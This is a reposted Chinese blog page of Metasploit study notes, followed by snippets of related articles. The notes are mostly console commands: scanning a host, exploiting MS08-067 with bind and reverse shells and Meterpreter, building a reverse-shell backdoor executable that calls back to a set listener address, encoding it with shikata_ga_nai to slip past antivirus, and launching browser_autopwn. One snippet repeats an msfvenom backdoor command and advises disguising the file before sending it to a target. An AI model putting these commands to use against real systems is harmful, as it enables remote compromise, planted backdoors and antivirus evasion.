metasploit study

最新推荐文章于 2025-12-26 10:41:42 发布
转载 最新推荐文章于 2025-12-26 10:41:42 发布 · 108 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/shanmao/p/3335045.html
文章标签:

#shell

本文详细介绍使用Metasploit框架进行渗透测试的过程,包括利用MS08-067漏洞获取远程shell,设置不同类型的payload,如bind_tcp、reverse_tcp和Meterpreter,以及生成和加密后门。此外,还介绍了如何利用辅助模块实现自动化浏览器攻击。

load db_tracker
db_nmap -T Aggressive -sV -n -O -v 192.168.0.107


绑定shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp

反弹shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp

Meterpreter方式
set PAYLOAD windows/meterpreter/reverse_tcp

生成后门
/msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 O
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 X > /root/server.exe 


加密后门
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 R | ./msfencode -e x86/shikata_ga_nai -t exe > /root/server1.exe


自动化浏览器攻击
use auxiliary/server/browser_autopwn

转载于:https://www.cnblogs.com/shanmao/p/3335045.html

dgitra7963
关注
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 1580
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
初探Metasploit的自动攻击
热门推荐
要不,单步调试走起?
01-08 1万+
本文总结下研究强大渗透平台:Metasploit结合强大的扫描器:Nessus,nmap后的自动攻击手法。
基于MetaSploit的网络攻击研究
毕业作品网站
02-11 892
摘 要 信息技术的高速发展使作为信息主要载体的网络现代化程度代表国家信息化发展的标志,更成为推进高科技产业发展的动力、国家实现现代化的根本途径之一。由于网络在当今世界国民经济中的重要性,网络也就成为信息安全攻防的主战场。 本文从网络安全现状入手,深入分析网络攻击的根源,对网络攻击原理进行深入、细致剖析,全面分类阐述网络攻击的主要手段与实现方法,对目前常见攻击手段和工具,做了细致的分析,给出了他们的特点和实施方法。在分析各类攻击分类的基础上, 对MetaSploit攻击平台进行研究,实现如何利用漏洞,如何进行
内网study
qq_53142368的博客
10-08 548
主要针对windows内网学习
第三章-4 Metasploit漏洞利用模块
划水的小白白
05-13 701
每日一句: 如何一别朱仙镇,不见将军奏凯歌。 ——于谦《岳忠武王祠》 本文内容: ~快速搭建有限制的测试环境 ~实战漏洞利用 ~MSF会话常用命令 ~其他问题补充 一、快速搭建有限制的测试环境 问:搭建测试环境的作用是什么? 答:在本地测试漏洞,然后授权的情况下进行相关漏洞挖掘 0,安装虚拟机,win server2008 1,安装phpstudy ~百度,PHP study,进官网直接下载就行 ~安装PHP study可能需要一些环
Kali利用metasploit 生成后门程序,操作目标主机cmd
qq_19641369的博客
11-27 5134
一.利用命令生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe LHOST:表示本机地址 -f :表示生成程序的后缀 met:文件名 可以自定义 把生成的exe文件发送给目标主机执行,注意记得伪装下否则会被杀毒软件识别,我这里是利用打包命令将其打包,然后发送到目标主机执行。 二.msfconsole 命令打开控制台 root@...
msf生成webshell_metasploit生成木马获取windowns控制权
weixin_39853968的博客
12-22 677
放纵自己的欲望是最大的祸害;谈论别人的隐私是最大的罪恶;不知自己过失是最大的病痛。 ——亚里士多德写在前面本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。准备环境:入侵机器:kali linux (IP地址:192.168.96.128)靶机:window server 2003 (IP地址:192.168.96.1...
Start Postgresql within Metasploit 4.4
weixin_30807677的博客
05-26 69
Followingtheinstructioninthebook"MetasploitThePenetrationTester'sGuide",iusedtostudypenetration,iamstuckedatpage20whenpracticethisinstruction: ======================== root@...
A Simple Study on Kali Linux
独行者103的专栏
11-03 460
Once upon of time, I heard about Kali Linux, a powerful tool of penetration testers, which is including metasploit and other various kinds of tools. What interests me is the metasploit which can hacki
Pentesting Vulnerable Study Frameworks Complete List
cnbird's blog
08-13 1276
It’s very difficult for the beginner security analyst, mainly the ones interested in the area of pentesting, to find good study pentesting resources. Starting from the principle that in pentesting the
网络安全的学习笔记_security_study_notes.zip
09-02
这些工具包括但不限于Wireshark、Nmap、Metasploit等,同时也会教授如何对系统进行漏洞分析、安全评估和加固。此外,笔记中可能还包含了各种加密技术,如对称加密、非对称加密、哈希算法、数字签名以及SSL/TLS协议等...
[系统安全] 六十二.恶意软件分析 (13)LLM赋能实现基于机器学习的恶意家族分类(初探)
杨秀璋的专栏
02-02 1461
前文探索了利用大模型辅助恶意代码分析,即LLM赋能Lark工具提取XLM代码的抽象语法树。这篇文章将继续尝试探索利用大模型辅助恶意代码分析,尝试进行恶意代码家族分类实验。在恶意代码分析过程中,大家会遇到各种各样的问题,如何结合LLM和GPT完成复杂任务,更好地为安全工程师合作至关重要。基础性探索文章,还请各位大佬多多指教,写得不足的地方还请海涵。希望您喜欢,且看且珍惜。
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 1777
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
Android (ADB)、iOS、OpenHarmony 常用调试命令对照表
u013379032的博客
12-23 514
本文对比了Android、iOS和OpenHarmony三大移动操作系统在设备调试场景下的常用命令。Android主要使用ADB命令,iOS可通过Libimobiledevice或xcrun工具,而OpenHarmony则采用HDC命令。内容涵盖设备连接、信息查询、应用管理、文件传输、系统调试等核心功能,并指出iOS调试的限制和OpenHarmony与ADB的相似性。所有平台调试前都需开启开发者模式,部分命令需要特殊权限。该对比为开发者提供了跨平台调试的快速参考指南。
内网横向移动 ?
qq_44936245的博客
12-23 932
本文介绍了内网横向移动渗透测试的全过程。首先通过webshell上传CS木马控制web服务器,随后进行信息收集,包括确认域环境、获取域控IP、收集域用户信息及扫描内网端口。在提权后利用mimikatz抓取内存中的账号密码,成功获取域控管理员凭证。最后通过IPC连接将木马上传到域控主机,为后续横向渗透做准备。整个过程展示了从外网渗透到内网横向移动的完整技术链,重点突出了信息收集、凭证窃取和横向移动的关键技术实现。
Python 解释器 + Shell 脚本实现桌面打开软件
a_zzzzzzzz的博客
12-24 390
在目录下新建。
loader命令导出大批量数据维护SQL
一瓢西湖水的博客
12-23 227
工作学习中,经常遇到几千,甚至上万条的数据维护任务,如果一条一条进行数据维护SQL的编写,将是巨大的工作量。本文将分享2个小技巧,减小准备大批量数据维护SQL的工作量。MySQL 中字符串用两个单引号 ‘’ 转义,而不是反斜杠。
小米电视安装Projectivy Launcher
最新发布
book_longker的专栏
12-26 306
替换为你刚才在电视上看到的实际 IP)
Metasploit框架基础教程
"Metasploit基础知识" Metasploit是一款强大的安全测试工具,它被广泛用于漏洞利用、渗透测试和安全研究。这个框架由各种接口组成,允许用户以不同的方式与其交互。本文将主要介绍Metasploit中的基础概念和一个重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值